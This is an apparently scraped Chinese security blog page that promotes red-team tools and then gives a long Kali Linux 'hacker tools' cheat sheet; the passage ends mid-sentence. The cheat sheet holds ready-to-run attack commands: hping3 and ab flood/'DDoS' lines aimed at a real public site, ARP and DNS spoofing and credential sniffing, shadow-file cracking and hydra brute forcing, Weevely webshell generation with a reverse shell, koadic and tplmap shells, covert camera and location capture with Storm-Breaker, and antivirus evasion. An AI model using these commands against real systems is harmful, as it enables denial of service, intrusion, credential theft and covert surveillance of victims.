ease; } .link-block:hover { background-color: #e0e0e0; } .link-block svg { width: 20px; height: 20px; fill: currentColor; margin-right: 12px; } 🚀 密探渗透测试工具 多功能渗透测试工具,适用于红队、SRC、安全研究,支持信息收集、测绘、扫描与爆破。 立即前往 GitHub 下载密探
2025年05月18日
356 阅读
0 评论
50 点赞
2025-05-17
【工具分享】AssetSpy 客户端内存资产捕手
今日分享AssetSpy 是一款专为红队实战设计的客户端内存扫描工具,支持UTF-8 / UTF-16 双编码识别,可通过进程名或 PID 定位目标应用,实时扫描其内存区域,精准提取出 URL 资源链接和域名信息,广泛适用于渗透测试、逆向分析、动态调试等场景中对客户端通信行为的资产还原。核心亮点多线程高性能:支持多进程并发扫描,结合 KMP 字符串搜索算法与分块优化,极大提升内存扫描效率。精准内存识别:可读取并分析 MEM_PRIVATE、MEM_IMAGE、MEM_MAPPED 三类内存区域,定位潜在资产位置。双编码全面提取:自动识别并解析 UTF-8 / UTF-16 编码,确保不遗漏任意 URL 数据。URL/域名智能去重:提取的 URL 与域名自动去重,防止重复记录,提升数据质量。分块扫描+页级去重:每次按 1MB 块读取,结合页级地址标记,防止重复访问内存区域。关键词精准命中:支持配置关键词(如 tt.com、api.xx.com),精准提取目标资产相关链接。实时监控模式:支持持续监听进程内存变化(-t 参数开启),实现资产实时捕获。结果自动输出:自动将扫描结果输出至 urls.txt 和 domains.txt,便于后续分析或导入其他工具。可视化终端输出:控制台支持彩色 Logo 与格式化结果输出,增强阅读体验与演示效果。实时监控简单演示除了提取程序中已存在的 URL,AssetSpy 还支持从运行时新分配的内存区域中识别动态生成的 URL。测试价值可发现调试/测试接口、上线域名、回调地址等关键资产;特别适合用于HTTPS 抓包失败、代码混淆程序加壳、动态拼接等绕过场景;是常规抓包/逆向手段之外的重要辅助方法,提升资产发现的全面性。暂不提供增强版,测试版可能有BUG,但不影响使用。工具下载 .link-block { display: flex; align-items: center; justify-content: center; padding: 14px 20px; border-radius: 12px; background-color: #f3f4f6; text-decoration: none; color: #111; font-weight: 500; cursor: pointer; transition: background 0.2s ease; } .link-block:hover { background-color: #e0e0e0; } .link-block svg { width: 20px; height: 20px; fill: currentColor; margin-right: 12px; } 🚀 AssetSpy 内存资产捕手 红队辅助工具,专注于扫描客户端内存并提取 URL 与域名,用于通信还原与敏感资产发现。 立即下载 AssetSpy(测试版)
2025年05月17日
391 阅读
0 评论
65 点赞
2025-05-16
【工具分享】TscanPlus 红队侦察自动化武器
今日分享无影(TscanPlus)是一款功能强大的网络安全检测与运维工具,专为资产测绘、漏洞挖掘和自动化渗透测试打造,适用于企业安全建设、红队作战以及安全运维等场景,是一款优秀的渗透测试工具。核心亮点综合能力强:集成端口扫描、服务识别、URL指纹识别、目录探测、弱口令破解、POC检测、域名枚举、空间测绘、URLFinder 等模块,覆盖从资产发现到漏洞利用的全链路。高效识别指纹:内置 5.2 万+ 指纹规则,1 万个网站指纹识别仅需 8-10 分钟,效率业内领先。自动化联动检测:支持指纹与 POC 关联,发现目标后自动触发密码破解或漏洞验证。POC系统强大:内置高质量 POC,支持接入 Nuclei、Xray、Afrog 等工具,按指纹结果自动匹配并执行。红队功能丰富:集成反弹 shell、CS上线命令、下载命令、WebShell、内网命令、权限维持等实战指令。辅助工具齐全:涵盖编码解码、加解密、JWT破解、Host碰撞、40x绕过、资产分拣、提权辅助、默认口令查询等。跨平台支持:基于 Go + Wails 构建,支持 Windows / Mac / Linux,UI 界面直观易用。工具说明适用于渗透测试工程师、安全运营人员、红队成员、甲方安全团队等,尤其适合在实战测试中进行快速资产识别与漏洞验证。端口扫描漏洞验证工具下载 .link-block { display: flex; align-items: center; padding: 14px 20px; border-radius: 12px; background-color: #f3f4f6; text-decoration: none; color: #111; font-weight: 500; transition: none; } .link-block:hover { background-color: #f3f4f6; box-shadow: none; } 🚀 TscanPlus 工具地址 高效实用的网络资产探测与漏洞挖掘工具,由 TideSec 团队开发。 立即前往 GitHub 下载 TscanPlus
2025年05月16日
513 阅读
0 评论
44 点赞
2025-05-15
【工具分享】XSStrike 智能化 XSS 挖掘工具
今日分享XSS 攻击是一种常见的网页漏洞利用方式,攻击者通过注入恶意脚本,使用户在不知情的情况下执行有害代码,进而实现信息窃取、身份冒用等攻击。目前常见的 XSS 扫描工具有 NoXss、XSSFORK、xwaf 等,今天给大家分享的是一款更智能、功能更强大的工具——XSStrike。相比于 xwaf,XSStrike 最大的优势在于内置了强大的 Payload 自动生成器,对于从事渗透测试和红队攻防的师傅们来说,非常实用。同时它还支持高效的爬虫功能、模糊测试、WAF 检测等,整体使用体验甚至让人联想到 xray,在引擎强度和智能化方面,XSStrike 更胜一筹,是一款值得推荐的实战利器。Payload工具下载 .link-block { display: flex; align-items: center; padding: 14px 20px; border-radius: 12px; background-color: #f3f4f6; text-decoration: none; color: #111; font-weight: 500; transition: none; } .link-block:hover { background-color: #e5e7eb; box-shadow: none; } 🚀 XSStrike XSS 扫描工具 一款基于 Python 编写的强大 XSS 渗透测试工具,支持 payload 自动生成、模糊测试和 WAF 检测。 立即前往 GitHub 下载 XSStrike
2025年05月15日
156 阅读
0 评论
24 点赞
2022-09-20
【工具分享】Kali Linux 黑客工具
留言这些工具我用的比较多,学习到的工具,我都会慢慢更新在这里,有些工具需要安装,说的不是太详细可以自行百度文章视频学习。niktoNikto是一个开源的WEB扫描评估软件,可以对Web服务器进行多项安全测试,能在230多种服务器上扫描出,2600多种有潜在危险的文件、CGI及其他问题。Nikto可以扫描指定主机的WEB类型、主机名、指定目录、特定CGI漏洞、返回主机允许的http模式等。nikto -host http://www.example.comsteghideSteghide是一款隐写术工具,用于在音频、图像、视频等文件中隐藏机密信息,并且可以加密隐藏的信息。它可以在文件中嵌入任意格式的数据,比如文本文件、图像、音频等等。tcpdumptcpdump是一个强大的网络数据包分析工具,它能够抓取网络上的数据包并将其分析。它可以用来诊断网络问题,分析网络安全问题,监测网络流量等,tcpdump可以运行在各种操作系统上,如Linux、Unix和Windows。unshadowunshadow 是一个 Unix 系统工具,用于将 /etc/passwd 和 /etc/shadow 文件合并为一个 John the Ripper 可读的文件,以便对系统的密码进行密码破解,该命令需要 root 权限,因为需要读取系统上的 shadow 文件,而该文件只有 root 用户才有权限读取。unshadow /etc/passwd /etc/shadow > passwords.txt这条命令会将 /etc/passwd 和 /etc/shadow 文件合并为一个文本文件(passwords.txt),可以使用 John the Ripper 工具对其进行密码破解。rar2johnrar2john是John the Ripper的一个工具,用于将RAR文件的加密密码结构转换为适用于John the Ripper的格式,通过这样做,您可以使用John the Ripper破解加密的RAR文件,以获取存储在其中的数据。rar2john file > 1.txt // 导出hash john 1.txt // 开始爆破hashabab 是web上的压力测试工具,可以实现cc攻击。-n:在测试会话中所执行的请求个数。默认时,仅执行一个请求。-c:一次产生的请求个数。默认是一次一个。ab -c 10000 -n 1000 http://www.baidu.com/hping3hping命令是一个基于命令行的TCP/IP工具,它在UNIX上得到很好的应用,不过它并非仅仅一个ICMP请求/响应工具,它还支持TCP、UDP、ICMP、RAW-IP协议,以及一个路由模型HPING一直被用作安全工具,可以用来测试网络及主机的安全。// syn flood 伪造随机源地址,时间间隔1000us hping3 -I eth1 -S 192.168.180.133 -p 80 --rand-source -i u1000 // tcp flood hping3 -SARUPF -p 80 --flood --rand-source 192.168.180.133 // udp flood hping3 --udp 192.168.180.133 -p 80 --rand-source --flood // icmp flood hping3 --icmp 192.168.180.133 --rand-source --flood // dns flood hping3 --udp 192.168.180.133 -p 53 --rand-source --flood // 数据包跟踪 hping3 --traceroute -V -1 www.qq.com // 多端口扫描 hping3 -I eth1 -8 1-1024 192.168.180.133macofmacof可以造成交换机mac泛洪,受到攻击之后,内部的CAM表很快就会被填满了,交换机退化成集线器,会将收到的数据包全部广播出去,从而无法正常地向局域网提供转发功能。-i interface 指定要发送的接口 -s src 指定源IP地址 -d dst 指定目标IP地址 -e tha 指定目标硬件地址 -x sport 指定TCP源端口 -y dport 指定TCP目标端口 -n times 指定要发送的数据包数macof // 开始攻击fpingfping是一个小型命令行工具,用于向网络主机发送ICMP ( Internet控制消息协议 )回应请求,类似于ping,但在ping多个主机时性能要高得多。 fping完全不同于ping,因为您可以在命令行上定义任意数量的主机,或者指定包含要ping的IP地址或主机列表的文件。-a 显示可ping通的目标 -A 将目标以ip地址的形式显示 -b <num> ping 数据包的大小。(默认为56) -B <f> 设置指数反馈因子到f -c <num> ping每个目标的次数 (默认为1) -C <num> 同-c,返回的结果为冗长格式 -e 显示返回数据包所费时间 -f <file> 从文件获取目标列表( - 表示从标准输入)(不能与 -g 同时使用) -g 通过指定开始和结束地址来生成目标列表(例如:fping –g 192.168.1.0 192.168.1.255)或者一个IP/掩码形式(例如:fping –g 192.168.1.0/24) -i <num> 设置ip的TTL值 (生存时间) -l 循环发送ping -m ping目标主机的多个网口 -n 将目标以主机名或域名显示(等价于 -d ) -p <num> 对同一个目标的ping包间隔(毫秒) (在循环和统计模式中,默认为1000) -q 安静模式(不显示每个目标或每个ping的结果) -Q <num> 同-q, 但是每n秒显示信息概要 -r <num 当ping失败时,最大重试次数(默认为3次) -s 打印最后的统计数据 -t <num> 单个目标的超时时间(毫秒)(默认500) -u 显示不可到达的目标 -v 显示版本号fping -v // 显示版本 fping -g 192.168.60.1/24 // 范围扫描 fping -g -a 192.168.60.1/24 // 显示可以ping通的主机并写到文本arp-scanarp-scan是Kali Linux自带的一款ARP扫描工具。该工具可以进行单一目标扫描,也可以进行批量扫描。批量扫描的时候,用户可以通过CIDR地址范围或者列表文件的方式指定。该工具允许用户定制ARP包,构建非标准数据包。同时,该工具会自动解析Mac地址,给出MAC对应的硬件厂商,帮助用户确认目标。什么是ARP协议地址解析协议(Address Resolution Protocol),其基本功能为透过目标设备的IP地址,查询目标设备的MAC地址,以保证通信的顺利进行。它是IPv4中网络层必不可少的协议,是根据IP地址获得物理地址MAC的一个TCP/IP协议。通过ARP,在局域网可以很容易构成一个ARP欺骗,从而得到有用数据信息。-f 从指定文件中读取主机名或地址 -l 从网络接口配置生成地址 -i 各扫描之间的时间差 -r 每个主机扫描次数 -V 显示程序版本并退出 -t 设置主机超时时间 -L 使用网络接口 -g 不显示重复的数据 -D 显示数据包往返时间arp-scan -l // 范围扫描 arp-scan -f ip.txt // ip范围扫描 arp-scan -l -i 1000 // 扫描之间的时间差 arp-scan -l -r 5 // 每个主机扫描次数 arp-scan -l -V // 显示程序版本并退出 arp-scan -t 1000 192.168.75.0/24 // 设置主机超时时间 arp-scan -L eth0 // 使用网络接口 arp-scan -l -g // 不显示重复的数据 arp-scan -l -D // 显示数据包往返时间 Weevely生成和管理很难检测到的PHP木马,这是一个Web应用程序后开发的重要工。可用于像一个隐藏的后门,作为一个有用的远程控制台更换管理网络帐户,即使托管在免费托管服务,类似于中国菜刀、蚂一剑等工具。weevely generate 208522 webshell.php // 生成webshell weevely http://192.168.80.131/webshell.php 208522 // 连接webshell :shell_su #通过更变使用者来执行shell命令,可以获得root权限来执行命令. :shell_sh #执行 shell 命令. :shell_php #执行 PHP 命令. :system_extensions #收集PHP和webserver扩展列表 :system_info #收集系统信息 :system_procs #列出正在运行的进程 :audit_disablefunctionbypass #使用mod_cgi和.htaccess绕过系统禁用函数的限制。它会上传.htaccess和CGI脚本,并在远程服务器上运行伪系统shell :audit_etcpasswd #查看/etc/passwd文件 :audit_suidsgid #查找带有SUID或SGID标志的文件。 :audit_phpconf #查看php配置信息 :audit_filesystem #审核文件系统的弱权限。枚举各种系统目录并寻找可读写执行的目录,模块仅默认搜索部分linux下的常见目录,logs、root、home等 :backdoor_reversetcp #执行反向TCP shell. 需要nc -lvp <port>监听 :backdoor_tcp # 在TCP端口上生成shell :net_scan #TCP端口扫描. :net_mail #发送邮件. :net_ifconfig #获取网络接口地址. :net_curl #执行类似curl的HTTP请求. :net_proxy #运行本地代理以通过目标转移HTTP / HTTPS浏览 :net_phpproxy #在目标上安装PHP代理. :bruteforce_sql #可用来猜解数据库密码. :file_find #查找具有给定名称和属性的文件. :file_download #从远程文件系统下载文件. :file_check #获取文件的属性和权限. :file_touch #更改文件时间戳. :file_cd #更改当前工作目录. :file_grep #打印与多个文件中的模式匹配的行. :file_gzip #压缩或解压gzip文件. :file_tar #压缩或解压tar文件. :file_enum #检查路径列表的存在和权限 :file_bzip2 #压缩或解压bzip2文件. :file_mount #使用HTTPfs挂载远程文件系统. :file_clearlog #从文件中删除字符串. :file_zip #压缩或解压zip文件. :file_cp #复制单个文件. :file_upload2web #自动将文件上传到Web文件夹并获取相应的URL. :file_edit #在本地编辑器上编辑远程文件. :file_read #从远程文件系统中读取远程文件. :file_webdownload #指定URL下载文件. :file_upload #文件上载到远程文件系统. :file_ls #列出目录内容. :file_rm #删除远程文件. :sql_dump #Multi dbms mysqldump replacement. :sql_console #执行SQL查询或运行sql控制台.netcatNetCat号称网络工具中的瑞士军刀,可以用它来做很多有用事情,比如侦听端口、端口扫描、传输文件、网络测速等等。1.侦听模式/传输模式2.Telnet/获取banner信息3.传输文本信息4.传输文件/目录5.加密传输文件6.远程控制/木马7.加密所有流量8.流媒体服务器9.远程克隆硬盘nc -lp 444 // 监听模式 nc -nv 192.168.60.121 444 // 连接ip进行通信 nc -nv 192.168.60.121 | ls -l // 远程执行命令 -v 详细输出-l 监听模式,用于入站连接-n 指定数字的IP地址,不能用hostname-p port 本地端口号-q 在stdin的EOF之后退出并延迟秒-z 将输入输出关掉--用于扫描时wirsharkWireshark是网络数据包分析软件,可以探测指定网卡收到的数据包,并尽可能的分析这些数据包的协议、数据等资料。Wireshark使用WinPCAP作为接口,直接与网卡进行数据报文交换,wirshark是图形化操作软件// 过滤规则 ip.src addr==192.168.0.208 or ip.src addr eq 192.168.0.208 // 显示来源IP ip.dst addr==192.168.0.208 or ip.dst addr eq 192.168.0.208 // 显示目标IP tcp.port eq 80 // 不管端口是来源的还是目标的都显示 tcp.port == 80 // 过滤80端口 tcp.port eq 2722 tcp.port eq 80 or udp.port eq 80 tcp.dstport == 80 // 只显tcp协议的目标端口80 tcp.srcport == 80 // 只显tcp协议的来源端口80 tcp.port >= 1 and tcp.port <= 80 // 过滤端口范围 // 工具能使用的协议有 TCP、udp、arp、icmp、http、smtp ftp、dns、msnms、ip、ssl、等等。 udp.length == 26 // 这个长度是指udp本身固定长度8加上udp下面那块数据包之和 tcp.len >= 7 // 指的是ip数据包(tcp下面那块数据),不包括tcp本身 ip.len == 94 // 除了以太网头固定长度14,其它都算是ip.len,即从ip本身到最后 frame.len == 119 // 整个数据包长度,从eth开始到最后nmapNmap,Linux下的网络扫描和嗅探工具包,一个网络连接端扫描软件,用来扫描网上电脑开放的网络连接端。确定哪些服务运行在哪些连接端,并且推断计算机运行哪个操作系统。简单而言,这就是一个工具,用来检测目标主机是否开启,其操作系统是什么,有那些端口是开启的,是否可以扫描到目标主机存在漏洞等等,从而制定渗透的计划。Nmap的探测结果以列表的形式展现,同时分为四个状态:open、closed、filtered(被过滤的)、unfiltered。open:该端口开放;closed:该端口关闭的;filtered:发出的探测数据包不能到达目标主机的目标端口;unfiltered:该端口可以被访问,但具体不清楚是开放的还是关闭的。nmap 192.168.60.1 // 最基础的使用 nmap 192.168.60.1 -vv // 查看其详细信息 namp -p 1-60 192.168.60.1 // 扫描指定端口 nmap -sP 192.168.60.1 // ping扫描 nmap --traceroute 192.168.60.1 // nmap路由追踪 nmap --scan-delay 10s 192.168.60.1 // 每次延迟10秒后再发送数据包,防止大量的扫描记录引起对方的防护。 nmap -Pn 192.168.60.1 // 跳过主机扫描,在扫描防火墙时很有必要。 nmap -iL 1.txt // 扫描文本里面所有的IP nmap -sS -T4 192.168.60.1 // syn 扫描 nmap -sF -T4 192.168.60.1 // fin 扫描 nmap -sA -T4 192.168.60.1 // ack扫描 nmap --script=auth 192.168.60.1 // 弱口令扫描 nmap --script=vuln 192.168.60.1 // 扫描常见漏洞 nmap --script=ftp-brute.nse 192.168.60.1 //扫描弱口令账号,但是所用字典很小 nmap -p 80 --script=http-enum.nse 192.168.60.1 //扫描WEB敏感目录hydrahydra 是一款世界顶级密码暴力破解工具,支持几乎所有的协议的在线破解,功能强大,其密码能否被破解关键取决于破解字典的是否足够强大,在网络安全渗透过程中是一款必备的测试工具。目前该工具支持以下协议的爆破:AFP,Cisco AAA,Cisco身份验证,Cisco启用,CVS,Firebird,FTP,HTTP-FORM-GET,HTTP-FORM-POST,HTTP-GET,HTTP-HEAD,HTTP-PROXY,HTTPS-FORM- GET,HTTPS-FORM-POST,HTTPS-GET,HTTPS-HEAD,HTTP-Proxy,ICQ,IMAP,IRC,LDAP,MS-SQL,MYSQL,NCP,NNTP,Oracle Listener,Oracle SID,Oracle,PC-Anywhere,PCNFS,POP3,POSTGRES,RDP,Rexec,Rlogin,Rsh,SAP / R3,SIP,SMB,SMTP,SMTP枚举,SNMP,SOCKS5,SSH(v1和v2),Subversion,Teamspeak(TS2),Telnet,VMware-Auth ,VNC和XMPP,使用xhydra可以打开图形界面。-R:继续从上一次进度接着破解 -S:大写,采用SSL链接 -s <PORT>:小写,可通过这个参数指定非默认端口 -l <LOGIN>:指定破解的用户,对特定用户破解 -L <FILE>:指定用户名字典 -p <PASS>:小写,指定密码破解,少用,一般是采用密码字典 -P <FILE>:大写,指定密码字典 -e <ns>:可选选项,n:空密码试探,s:使用指定用户和密码试探 -C <FILE>:使用冒号分割格式,例如“登录名:密码”来代替 -L/-P 参数 -M <FILE>:指定目标列表文件一行一条 -t 指定多线程数,默认为16个线程 -o <FILE>:指定结果输出文件 -f :在使用-M参数以后,找到第一对登录名或者密码的时候中止破解 -t <TASKS>:同时运行的线程数,默认为16 -w <TIME>:设置最大超时的时间,单位秒,默认是30s -v / -V:显示详细过程 server:目标ip// 爆破SSH: hydra -L user.txt -P passwd.txt -o ssh.txt -vV -t 10 192.168.43.94 ssh // -L指定用户字典 -P 指定密码字典 -o把成功的输出到ssh.txt文件 -vV显示详细信息 -t 指定线程数 // 爆破FTP hydra -L user.txt -P passwd.txt -o ftp.txt -t 5 -vV 192.168.43.94 ftp // -L指定用户名列表 -P指定密码字典 -o把爆破的输出到文件 -t指定线程 -vV 显示详细信息 // 爆破telnet hydra 192.168.43.34 -L user.txt -P passwd.txt -t 10 telnet // 爆破3389 hydra 192.168.43.34 rdp -L user.txt -P passwd.txt -Vdirbdirb 是一个基于命令行的工具,可以根据单词列表对任何目录进行暴力破解。 它会发出一个 HTTP 请求,并查看每个请求的 HTTP 响应代码。-a 设置ua -c 设置cookie带cookie扫描 -N 忽略某些响应码 -o 输出结果 -p 使用代理 -X 在每个测试目录上附加后缀 -z 设置毫秒延迟dirb http://www.baidu.com // 正常扫描 dirb http://www.baidu.com 1.txt // 带用户字典 dirb http://www.baidu.com 1.txt -a "ua" -c "cookie" // 设置 ua 和 cookie dirb http://www.baidu.com 1.txt -p ip:port -o result.txt // 使用代理和输出结果 dirb http://www.baidu.com 1.txt -z 1000 // 设置毫秒延迟arpspoofarpspoof 是一款进行arp欺骗的工具,攻击者可以通过它来毒化受害者arp缓存,将网关mac替换为攻击者mac,然后攻击者可截获受害者发送和收到的数据包,可获取受害者账户、密码等相关敏感信息。ARP欺骗,是让目标主机的流量经过主机的网卡,再从网关出去,而网关也会把原本流入目标机的流量经过我得电脑。工具使用非常简单arpspoof -i eth0 -t 192.168.60.119 192.168.60.1 // 第一个ip是要攻击的主机 第二个ip是要伪装的ip可以填网关 arpspoof -i 网卡 -t 目标IP 网关 // 反向欺骗 arpspoof -i 网卡 -t 网关 目标IPettercap开启流量转发就不会断网受害者的流量会经过攻击者的机器可以实现嗅探echo 1 > /proc/sys/net/ipv4/ip_forward // 开启流量转发 ettercap -G // UI窗口化 ettercap -Tqi eth0 // 进行账号密码嗅探 ettercap -Tqi eth0 -M arp:remote /// /10.11.112.1// // 嗅探网关网页账号密码 ettercap -Tqi eth0 -M ARP // arp毒化eth0所在的网段,安静模式文本显示 ettercap -Tzq /10.0.0.1/21,22,23 -w hack.pcap // 监听10.0.0.1的ftp,ssh,telnet信息,并保存到本地 ettercap -Tq -P dns_spoof -M arp /192.168.1.120/ // 对192.168.1.120进行dns欺骗,使用默认网卡eth0文本模式安静显示 ettercap -Tqi eth0 -L sniffed_data -F filter.ef -M arp:remote /10.0.0.2/80 // 使用过滤并监听10.0.0.2在80端口的所有通信,安静模式文本显示,保存数据到本地 ettercap -Tqi eth0 -M ARP /ip// -w scan.logevillimiterevillimiter这个工具可以直接限制别人的网速,这个项目在github上开源,感兴趣可以去看下是 Python3编写的程序。Github地址: https://github.com/bitbrute/evillimiter下载安装直接 git clone https://github.com/bitbrute/evillimiter.git下载到本地后解压,最好是用linux环境,运行需要Python3环境执行 sudo Python setup.py install 来安装 # 按情况来安装好,输入evillimiter进入就可以操作了。┌──(root㉿kali)-[/home/kali/evillimiter] └─# evillimiter // 进入 (Main) >>> scan // 扫描局域网主机 100% |██████████████████████████████| 256/256 OK 12 hosts discovered. (Main) >>> hosts // 列出扫描结果 ┌Hosts────────────────┬───────────────────┬──────────┬────────┐ │ ID │ IP address │ MAC address │ Hostname │ Status │ ├────┼────────────────┼───────────────────┼──────────┼────────┤ │ 0 │ 192.168.60.1 │ 64:6e:97:39:fa:1c │ │ Free │ │ 1 │ 192.168.60.100 │ 90:e8:68:d4:ea:d9 │ │ Free │ │ 2 │ 192.168.60.102 │ 14:5a:fc:3e:52:ed │ │ Free │ │ 3 │ 192.168.60.103 │ 30:f7:72:26:90:11 │ │ Free │ │ 4 │ 192.168.60.104 │ a8:93:4a:2b:dc:87 │ │ Free │ │ 5 │ 192.168.60.105 │ a8:93:4a:89:9d:0d │ │ Free │ │ 6 │ 192.168.60.106 │ e8:d0:fc:c9:ab:27 │ │ Free │ │ 7 │ 192.168.60.107 │ 94:08:53:2f:17:41 │ │ Free │ │ 8 │ 192.168.60.111 │ 00:0c:29:77:cc:fb │ │ Free │ │ 9 │ 192.168.60.117 │ 00:0c:29:32:31:71 │ │ Free │ │ 10 │ 192.168.60.119 │ 04:d9:f5:5f:d3:e3 │ │ Free │ │ 11 │ 192.168.60.250 │ 80:18:44:ed:fc:7c │ │ Free │ └────┴────────────────┴───────────────────┴──────────┴────────┘ (Main) >>> limit 11 1kbit // 进行限速 1kbit 网速 OK 192.168.60.119 upload / download limited to 1kbit. (Main) >>> free 7 // 解除限制 (Main) >>> quit // 退出 sqlmap如果你正在寻找一个开源渗透测试工具。sqlmap 是最好的之一。它可以自动化利用 SQL 注入漏洞的过程,并帮助你接管数据库服务器。sqlmap.py -u url // 判断是否存在注入 sqlmap.py -u url --dbs // 查询当前用户的所有数据库 sqlmap.py -u url -D 数据库 --tables // 获取数据库中的表名 sqlmap.py -u url -D 数据库 -T 表名 --columns // 获取表中的字段名 sqlmap.py -u url -D 数据库 -T 表名 -C 字段 --dump // 获取字段内容 sqlmap.py -u url --users // 获取数据库所有的用户 sqlmap.py -u url --passwords // 获取数据库用户的密码 sqlmap.py -u url --curerent-db // 获取当前网站数据库名 sqlmap.py -u url --current-user // 获取当前网站数据库的用户名称 sqlmap.py -u url --is-dba // 当前用户是否为管理权限StormBreaker无需任何权限即可获取设备信息网址定位位置 [智能手机]网络摄像头偷拍、网址录音感兴趣可以去Github上看看Github地址:https://github.com/ultrasecurity/Storm-Breaker# Linux 操作系统安装 git clone https://github.com/ultrasecurity/Storm-Breaker cd Storm-Breaker sudo bash install.sh sudo python3 -m pip install -r requirements.txt sudo python3 st.pymsfconsolemsfconsole是metasploit中的一个工具(kali自带工具)msfconsole集成了很多漏洞的利用的脚本,并且使用起来很简单的网络安全工具banner // 替换logo search port:443 // 漏洞搜索 use // 指定模块 info // 查看模块信息 back // 返回上一级 show options // 查看参数 show targets // 模块可攻击目标的类型 run、explpit、run -j // 这三个都是执行 check // 检测是否存在漏洞 connect // 连接端口 类似nc sessions // 可以查看运行的会话,一般在回去靶机权限时使用 sessions -i 会话号 // 可以进入运行的会话 getuid // 提权Yersiniayersinia是OSI第2层的攻击的框架,支持生成树协议(STP),VLAN中继协议(VTP),动态中继协议(DTP),IEEE 802.1Q,IEEE 802.1X,思科发现协议(CDP),动态主机配置协议(DHCP)等可以实现dhcp泛洪攻击、交换机欺骗、STP欺骗、ARP欺骗、DHCP欺骗(伪装成dhcp服务器)h 帮助屏幕 x 选择并执行攻击 i 选择网卡 ENTER 关于选择项目的信息 v 查看数据包的16进制 d 加载协议默认值 e 编辑数据表字段 f 列出捕获文件 s 从协议保存数据包 S 保存-来自所有协议的数据包 L 从网络学习数据包 N 设置Mac欺骗开/关 l 列出正在运行的攻击 K 杀死所有正在运行的攻击 c 清除当前协议statc C 清除所有协议状态 g 转到其他协议屏幕 ctrl-l 重绘屏幕 w 写入配置文件 a 关于这个工具 q 退出yersinia -G // 启动图形化界面 yersinia 协议 -interface 网卡-attack id // 命令行的方式hping3// DDOS攻击 (分布式拒绝服务攻击) // UDP ddos攻击: hping3 -c 10000 -d 120 --udp -w 64 -p 80 --flood --rand-source www.baidu.com 1 // ICMP ddos攻击: hping3 -c 10000 -d 120 --icmp -w 64 -p 80 --flood --rand-source www.baidu.com 1 // SYN ddos攻击: hping3 -c 10000 -d 120 -S -w 64 -p 80 --flood --rand-source www.baidu.com 1 // ACK ddos攻击: hping3 -c 10000 -d 120 -A -w 64 -p 80 --flood --rand-source www.baidu.com // 端口扫描 hping3 -I eth0 -S 192.168.10.1 -p 80dnsspoofdnsspoof是一个dns欺骗工具 我们使用locate dnsspoof.hosts找到这个文件vi 编辑他如下 对应映射会跳转到别胡网站:10.10.10.3 .baidu.com10.10.10.3 .google.com.hkecho 1 >> /proc/sys/net/ipv4/ip_forward arpspoof -i eth0 -t 10.10.10.2 10.10.10.254 arpspoof -i eth0 -t 10.10.10.254 10.10.10.2 // 过滤规则 dnsspoof -i eth0 -f dnsspoof.hosts host 10.10.10.2 and udp port 53dnsspoof的原理如下:由于DNS协议使用是传输层协议是UDP协议, 这样无需像TCP那样建立连接就可以轻松的伪造应答包,包括源IP. 10.10.10.2发送DNS 查询包问DNS服务器www.baidu.com的IP地址是多少? 10.10.10.1装作DNS服务器(伪造IP)向攻击目标发送一个DNS响应包说www.baidu.com的IP地址是10.10.10.3。ipdrone通过ip返回经纬度一些信息可实现定位,只能定位到市类似你在百度上搜,ip返回的运营商大概的位置,需要python环境里面没什么厉害的代码,就是调了个api接口实现的。Github: https://github.com/noob-hackers/ipdronepython ipdrone.py -v 127.0.0.1 // 示例 setoolkit功能有很多自己研究吧,一般常用克隆网站,骗取输入账号密码。Aircrack-ng暴力破解WIFI密码的工具,前提需要独立的无线网卡一块,没有其实也是有办法的。httrack爬取网页文件的工具,也就是爬虫工具,在终端输入httrack安装下就行。burpsuiteburp Suite 是用于攻击web 应用程序的集成平台。它包含了许多工具,并为这些工具设计了许多接口,以促进加快攻击应用程序的过程。所有的工具都共享一个能处理并显示HTTP 消息,持久性,认证,代理,日志,警报的一个强大的可扩展的框架。beef漏洞分为存储型、反射型、DOM型,最常见的就是利用XSS漏洞弹窗,进一步获取用户Cookie信息。可是如今的WEB系统,有的已经设置HttpOnly属性,有的在请求头中使用Authorization字段提供token令牌,这导致了我们难以获取到用户的身份信息。在这个背景下,XSS漏洞好像越来越没用了。BeEF-XSS是一款非常强大的XSS平台,集成了许多payload,利用它可以极大的提高XSS漏洞的威力。binwalkbinwalk是kali系统中下的文件分析工具。主要是用于CTF_杂项的隐写题,分离提取隐写的文件。如:从图片里分离出压缩包,从流量分析文件里分离出图片,压缩包等。binwalk filepath // 分析文件 binwalk -e filepath // 提取文件volatilityvolatility常用于以下镜像文件的取证:raw、vmen、dmp、img,工具需要自行下载。git clone https://github.com/volatilityfoundation/volatility.gitxsserxsser是一款用于web端自动挖掘和利用xss漏洞的工具,功能非常强大。xsser #命令行启动 xsser –gtk #GUI界面 xsser -u "http://xxx.xxx.xxx/" # 指定 URLpompemPompem的开源工具,该工具可以在当前最热门或最重要的漏洞数据库中搜索漏洞以及相应的漏洞利用代码。该工具采用Python开发,可以帮助渗透测试人员或白帽黑客快速完成漏洞审计任务。# 输入一些网站的框架就可以搜索相关的漏洞 pompem -s Wordpress pompem -s Joomla --html pompem -s "Internet Explorer,joomla,wordpress" --html pompem -s FortiGate --txt pompem -s ssh,ftp,mysqldirsearchdirsearch是一个基于python的高级命令行工具, 旨在对web服务器中的目录和文件进行暴力破解。它和我们平时使用的dirb、御剑等工具一样,就是为了扫描网站的敏感文件和目录从而找到突破口。dirsearch -u http://www.xxx.comGithub: https://github.com/maurosoria/dirsearchtplmapTplmap是一款自动检测和发掘服务器端模板注入漏洞的工具。支持测试Mako, Jinja2, Jade, Smarty, Freemarker, Velocity, 和Twig。python3 tplmap.py -u http://4ed902ae-b677-45c3-a0c1-4c8a88af7f07.node3.buuoj.cn/qaq?name=1 --engine=Jinja2 --os-shell Github: https://github.com/epinna/tplmapkoadic在渗透测试过程中,小伙伴们通常会使用netcat、ncat进行反弹shell,但windows电脑通常不具备开箱即用这些命令的特点,故本期视频我们将分享一个工具koadic,它可以利用windows自带的mshta命令,进行反弹shell从而控制整台windows计算机。同时在关闭终端后依然可以维持会话,除此之外,koadic工具还提供了各种实用的小功能,大家可以自行使用。git clone https://github.com/zerosum0x0/koadic.git cd koadic pip3 install -r requirements.txt ./koadicVeilVeil Evasion,Veil Evasion是linux的一款免杀工具,是一个用 Python 编写的免杀框架,用来生成MSF的Payload,能绕过常见的杀毒软件,它可以将任意脚本或一段 Shellcode 转换成 Windows 